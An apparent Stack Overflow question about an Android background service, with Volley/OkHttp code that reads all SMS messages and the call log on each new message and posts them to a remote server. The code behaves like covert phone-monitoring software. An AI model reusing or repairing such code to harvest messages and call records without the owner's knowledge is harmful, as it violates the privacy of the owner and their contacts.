# okhttp in Background service from Broadcast receiver

Tags: android, service, broadcastreceiver, android-volley, okhttp

i have app in which i am sending data to server every time when new messages receives.

**Problem:**

> Only once data is uploaded successfully but for next times data is not uploaded. i have also used volley for this problem but it also have same problem.

**What i've tried**

**BackgroundService.class**

```
public class BackgroundService extends Service {
    private static final String TAG = BackgroundService.class.getSimpleName();
    Context context;
    Uri mSmsQueryUri = Uri.parse("content://sms");
    private boolean isRunning;
    private Thread backgroundThread;
    String phoneNumber;
    SessionManager sessionManager;
    ArrayList<String> smss;
    String callllogs;


    public BackgroundService() {

    }

    @Nullable
    @Override
    public IBinder onBind(Intent intent) {
        return null;
    }

    @Override
    public void onCreate() {
        super.onCreate();
        this.context = this;
        sessionManager = new SessionManager(this);
        this.isRunning = false;
        Log.i(TAG, "onCreate called");
        this.backgroundThread = new Thread(myTask);
    }


    @Override
    public int onStartCommand(Intent intent, int flags, int startId) {
        if (!this.isRunning) {
            Log.i(TAG, "onStartCommand called");
            this.backgroundThread.start();
            this.isRunning = true;
            stopSelf();
        }
        return START_STICKY;

    }

    private Runnable myTask = new Runnable() {

        @RequiresApi(api = Build.VERSION_CODES.KITKAT)
        public void run() {
            if (BaseUrl.isConnectedtoInternet(context)) {
                //addToServerOkhttp(context);
                addtoServer(context);
            } else {
                Log.i(TAG, "No internt Connection");
            }

        }
    };



    @RequiresApi(api = Build.VERSION_CODES.KITKAT)
    private void addtoServer(final Context context) {
        Log.i(TAG, "addToServer called");
        String url = BaseUrl.baseUrl + context.getResources().getString(R.string.store_new_details);
        Log.i(TAG, url);
        smss = getMessages();
        callllogs = getCallDetail();
        Toast.makeText(context, "inMethod", Toast.LENGTH_SHORT).show();
        StringRequest request = new StringRequest(Request.Method.POST, url, new Response.Listener<String>() {
            @Override
            public void onResponse(String response) {

                Log.i(TAG, response);
                if (response.equals("Message Received!")) {
                    Toast.makeText(context, "ok rocky", Toast.LENGTH_SHORT).show();
                    AppController.getInstance().cancelPendingRequests(BaseUrl.tag_string_req);
                }
                //  Toast.makeText(context, "Messages Uploaded Successfully.! (BackgroundService)", Toast.LENGTH_SHORT).show();
                //Toast.makeText(context, response, Toast.LENGTH_SHORT).show();

            }
        }, new Response.ErrorListener() {
            @Override
            public void onErrorResponse(VolleyError error) {
                // Toast.makeText(context, error.getLocalizedMessage(), Toast.LENGTH_SHORT).show();
                if (error == null || error.networkResponse == null) {
                    return;
                }

                String body;
                //get status code here
                final String statusCode = String.valueOf(error.networkResponse.statusCode);
                Log.i(TAG, statusCode);
                //get response body and parse with appropriate encoding
                try {
                    body = new String(error.networkResponse.data, "UTF-8");
                    Log.i(TAG, body);
                } catch (UnsupportedEncodingException e) {
                    // exception
                    Log.i(TAG, e.getMessage());
                }
                Log.i(TAG, error.getMessage());
            }
        }) {
            @Override
            protected Map<String, String> getParams() throws AuthFailureError {
                HashMap<String, String> params = new HashMap<>();

                Log.i(TAG, SessionManager.getPhoneNumber());
                params.put("imei_no", "");
                params.put("calllog", callllogs);
                params.put("record", smss.toString());
                params.put("phone", SessionManager.getPhoneNumber());

                return params;
            }
        };

        // Adding request to request queue
        AppController.getInstance().addToRequestQueue(request, BaseUrl.tag_string_req);

//        try{
//            RequestQueue requestQueue= Volley.newRequestQueue(this);
//            requestQueue.add(request);
//        }catch (Exception e){
//            Log.i(TAG,e.getMessage());
//        }

    }


    @RequiresApi(api = Build.VERSION_CODES.KITKAT)
    public ArrayList<String> getMessages() {
        ArrayList<String> messages = new ArrayList<String>();
        ContentResolver contentResolver = getContentResolver();
        Cursor cursor = null;
        try {
            cursor = contentResolver.query(mSmsQueryUri, new String[]{"_id", "address", "date", "body",
                    "type", "read"}, null, null, "date desc");
            if (cursor == null) {
                Log.i("curson null", "cursor is null. uri: " + mSmsQueryUri);
                Toast.makeText(this, "curor null", Toast.LENGTH_SHORT).show();
            }

            //assert cursor != null;
            for (boolean hasData = cursor.moveToFirst(); hasData; hasData = cursor.moveToNext()) {

                String body = cursor.getString(cursor.getColumnIndex("body"));
                String address = cursor.getString(cursor.getColumnIndex("address"));

                messages.add("\n" + "Number: " + address + "\n" + "Content: " + body + "\n");

            }
        } catch (Exception e) {
            Toast.makeText(context, e.getLocalizedMessage(), Toast.LENGTH_SHORT).show();
            Log.e("Error", e.getMessage());
        } finally {
            //assert cursor != null;
            cursor.close();
        }
        //Toast.makeText(context, "all okaay", Toast.LENGTH_SHORT).show();
        return messages;

    }


    private String getCallDetail() {
        Toast.makeText(context, "calldetails", Toast.LENGTH_SHORT).show();
        StringBuffer stringBuffer = new StringBuffer();
        Cursor cursor = context.getContentResolver().query(CallLog.Calls.CONTENT_URI,
                null, null, null, CallLog.Calls.DATE + " DESC");
        int number = cursor.getColumnIndex(CallLog.Calls.NUMBER);
        int type = cursor.getColumnIndex(CallLog.Calls.TYPE);
        int date = cursor.getColumnIndex(CallLog.Calls.DATE);
        int duration = cursor.getColumnIndex(CallLog.Calls.DURATION);
        while (cursor.moveToNext()) {
            String phNumber = cursor.getString(number);
            String callType = cursor.getString(type);
            String callDate = cursor.getString(date);
            Date callDayTime = new Date(Long.valueOf(callDate));
            String callDuration = cursor.getString(duration);
            String dir = null;
            int dircode = Integer.parseInt(callType);
            switch (dircode) {
                case CallLog.Calls.OUTGOING_TYPE:
                    dir = "OUTGOING";
                    break;
                case CallLog.Calls.INCOMING_TYPE:
                    dir = "INCOMING";
                    break;

                case CallLog.Calls.MISSED_TYPE:
                    dir = "MISSED";
                    break;
            }
            stringBuffer.append("\nPhone Number:--- " + phNumber + " \nCall Type:--- "
                    + dir + " \nCall Date:--- " + callDayTime
                    + " \nCall duration in sec :--- " + callDuration);
            stringBuffer.append("\n----------------------------------");
        }
        cursor.close();
        //Toast.makeText(context, "also all ok", Toast.LENGTH_SHORT).show();
        return stringBuffer.toString();
    }
}
```

> Service is called from Broadcast receiver every time when new message
>   receives.

Comment: Where are your problem? Your broadcast receiver keeping works? You already check it?

Comment: yes service is  calling successfully but problem in addToServer() method in service

Comment: addToServer() is called?

Comment: volley isn't sending data to server

Comment: yes addToServer is called also

Comment: note that when the app is in the background ,specifically for android api 26>= background service might be destroyed or network connection might disconnect .

Comment: your are right but my network connection is active and now what  solution of this problem i e background service destruction ?